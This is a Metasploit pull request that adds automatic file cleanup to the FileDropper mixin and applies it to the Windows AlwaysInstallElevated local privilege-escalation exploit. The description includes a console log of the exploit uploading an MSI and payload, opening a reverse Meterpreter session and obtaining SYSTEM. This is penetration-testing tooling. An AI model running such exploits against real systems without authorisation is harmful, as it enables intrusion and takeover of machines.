### PR TITLE
File dropper support local

### DIFF
--- a/lib/msf/core/exploit/file_dropper.rb
+++ b/lib/msf/core/exploit/file_dropper.rb
@@ -71,17 +71,38 @@ module Exploit::FileDropper
 	alias register_file_for_cleanup register_files_for_cleanup
 
 	#
-	# Warn the user if any files (registered with {#register_dropped_file}) were
-	# not cleaned up
+	# While the exploit cleanup do a last attempt to delete any files created
+	# if there is a file_rm method available. Warn the user if any files were
+	# not cleaned up.
 	#
-	# @see Msf::Exploit#cleanup
+	# see Msf::Exploit#cleanup
+	# see Msf::Post::File#file_rm
 	def cleanup
 		super
-		if @dropped_files and @dropped_files.any?
-			@dropped_files.each do |f|
-				print_warning("This exploit may require manual cleanup of: #{f}")
+
+		# Check if file_rm method is available (local exploit, mixin support, module support)
+		if not @dropped_files or @dropped_files.empty?
+			return
+		end
+
+		if respond_to?(:file_rm)
+			@dropped_files.delete_if do |file|
+				begin
+					file_rm(file)
+					print_good("Deleted #{file}")
+					true
+				#rescue ::Rex::SocketError, ::EOFError, ::IOError, ::Errno::EPIPE, ::Rex::Post::Meterpreter::RequestError => e
+				rescue ::Exception => e
+					vprint_error("Failed to delete #{file}: #{e.to_s}")
+					false
+				end
 			end
 		end
+
+		@dropped_files.each do |f|
+			print_warning("This exploit may require manual cleanup of: #{f}")
+		end
+
 	end
 end
 end

--- a/lib/msf/core/exploit/file_dropper.rb
+++ b/lib/msf/core/exploit/file_dropper.rb
@@ -75,8 +75,8 @@ module Exploit::FileDropper
 	# if there is a file_rm method available. Warn the user if any files were
 	# not cleaned up.
 	#
-	# see Msf::Exploit#cleanup
-	# see Msf::Post::File#file_rm
+	# @see Msf::Exploit#cleanup
+	# @see Msf::Post::File#file_rm
 	def cleanup
 		super
 

--- a/modules/exploits/windows/local/always_install_elevated.rb
+++ b/modules/exploits/windows/local/always_install_elevated.rb
@@ -18,6 +18,7 @@ class Metasploit3 < Msf::Exploit::Local
 	include Msf::Post::Common
 	include Msf::Post::File
 	include Msf::Post::Windows::Registry
+	include Msf::Exploit::FileDropper
 
 	def initialize(info={})
 		super(update_info(info, {
@@ -103,36 +104,11 @@ class Metasploit3 < Msf::Exploit::Local
 		end
 	end
 
-	def cleanup
-		if not @executed
-			return
-		end
-
-		begin
-			print_status("Deleting MSI...")
-			file_rm(@msi_destination)
-		rescue Rex::Post::Meterpreter::RequestError => e
-			print_error(e.to_s)
-			print_error("Failed to delete MSI #{@msi_destination}, manual cleanup may be required.")
-		end
-
-		begin
-			print_status("Deleting Payload...")
-			file_rm(@payload_destination)
-		rescue Rex::Post::Meterpreter::RequestError => e
-			print_error(e.to_s)
-			print_error("Failed to delete payload #{@payload_destination}, this is expected if the exploit is successful, manual cleanup may be required.")
-		end
-	end
-
 	def exploit
 
 		if check != Msf::Exploit::CheckCode::Vulnerable
-			@executed = false
 			return
 		end
-
-		@executed = true
 
 		msi_filename = "exec_payload.msi" # Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi"
 		msi_source = ::File.join(Msf::Config.install_root, "data", "exploits", "exec_payload.msi")
@@ -144,12 +120,14 @@ class Metasploit3 < Msf::Exploit::Local
 		#upload_file - ::File.read doesn't appear to work in windows...
 		source = File.open(msi_source, "rb"){|fd| fd.read(fd.stat.size) }
 		write_file(@msi_destination, source)
+		register_file_for_cleanup(@msi_destination)
 
 		# Upload payload
 		payload = generate_payload_exe
 		@payload_destination = expand_path("%TEMP%\\payload.exe").strip
 		print_status("Uploading the Payload to #{@payload_destination} ...")
 		write_file(@payload_destination, payload)
+		register_file_for_cleanup(@payload_destination)
 
 		# Execute MSI
 		print_status("Executing MSI...")


### PR DESCRIPTION
Adds support to FileDropper for local exploits cleanup. In order to do this the cleanup function on FileDropper check if there is a file_rm function available (and files to drop awright). In this way, local exploits (when using Post::File) can benefit from automatically cleanup.

Other modules, if they have access to a file_rm function (in a mixin or in the same module), also can benefit from automatic cleanup.

For testing purposes, the recently local exploit modules/exploits/windows/local/always_install_elevated.rb has been modified to use it:

<pre>
msf  exploit(handler) > use exploit/windows/local/always_install_elevated 
msf  exploit(always_install_elevated) > set SESSION 1
SESSION => 1
msf  exploit(always_install_elevated) > exploit

[*] Started reverse handler on 192.168.1.129:4444 
[+] HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated is 1.
[+] HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated is 1.
[*] Uploading the MSI to C:\DOCUME~1\juan\LOCALS~1\Temp\exec_payload.msi ...
[*] Uploading the Payload to C:\DOCUME~1\juan\LOCALS~1\Temp\payload.exe ...
[*] Executing MSI...
[*] Sending stage (752128 bytes) to 192.168.1.147
[*] Meterpreter session 2 opened (192.168.1.129:4444 -> 192.168.1.147:1049) at 2012-11-28 22:14:32 +0100
[+] Deleted C:\DOCUME~1\juan\LOCALS~1\Temp\exec_payload.msi
[!] This exploit may require manual cleanup of: C:\DOCUME~1\juan\LOCALS~1\Temp\payload.exe

meterpreter > 
[*] Session ID 2 (192.168.1.129:4444 -> 192.168.1.147:1049) processing InitialAutoRunScript 'migrate -k -f'
[*] Current server process: payload.exe (2620)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1636
[+] Successfully migrated to process 
[*] Killing original process with PID 2620
[+] Successfully killed process with PID 2620

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.147 - Meterpreter session 2 closed.  Reason: User exit
msf  exploit(always_install_elevated) > 

</pre>
